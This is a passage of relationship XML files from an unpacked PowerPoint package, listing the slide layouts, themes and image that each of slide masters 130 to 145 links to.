Target="../slideLayouts/slideLayout1294.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1293.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1292.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme130.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1300.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1291.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster131.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1309.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1308.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1307.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1306.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1305.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1304.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1303.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1302.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme131.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1310.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1301.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster132.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1319.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1318.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1317.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1316.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1314.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1313.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1312.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme132.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1320.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1311.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster133.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1329.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1328.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1327.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1326.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1325.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1324.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1323.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1322.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme133.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1330.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1321.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster134.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1339.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1338.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1337.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1336.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1335.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1334.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1333.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1332.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme134.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1340.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1331.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster135.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1349.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1348.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1347.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1346.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1345.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1344.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1343.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1342.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme135.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1350.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1341.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster136.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1359.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1358.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1357.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1356.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1355.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1354.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1353.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1352.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme136.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1360.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1351.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster137.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1369.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1368.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1367.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1366.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1365.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1364.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1363.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1362.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme137.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1370.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1361.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster138.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1379.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1378.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1377.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1376.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1375.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1374.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1373.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1372.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme138.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1371.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster139.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1389.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1388.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1387.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1386.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1385.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1384.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1383.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1382.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme139.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1390.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1381.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout139.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout138.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout137.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout136.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout135.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout134.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout133.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout132.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme14.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout140.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout131.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster140.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1399.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1398.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1397.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1396.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1395.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1394.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1393.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1392.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme140.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1400.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1391.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster141.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1409.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1408.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1407.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1406.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1405.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1404.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1403.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1402.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme141.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1410.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1401.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster142.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1419.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1418.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1417.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1416.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1415.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1414.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1413.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1412.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme142.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1420.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1411.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster143.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1429.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1427.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1426.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1425.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1424.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1423.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1422.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme143.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1430.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1421.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster144.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1439.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1438.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1437.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1436.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1435.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1434.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1433.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1432.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme144.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1440.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1431.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster145.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
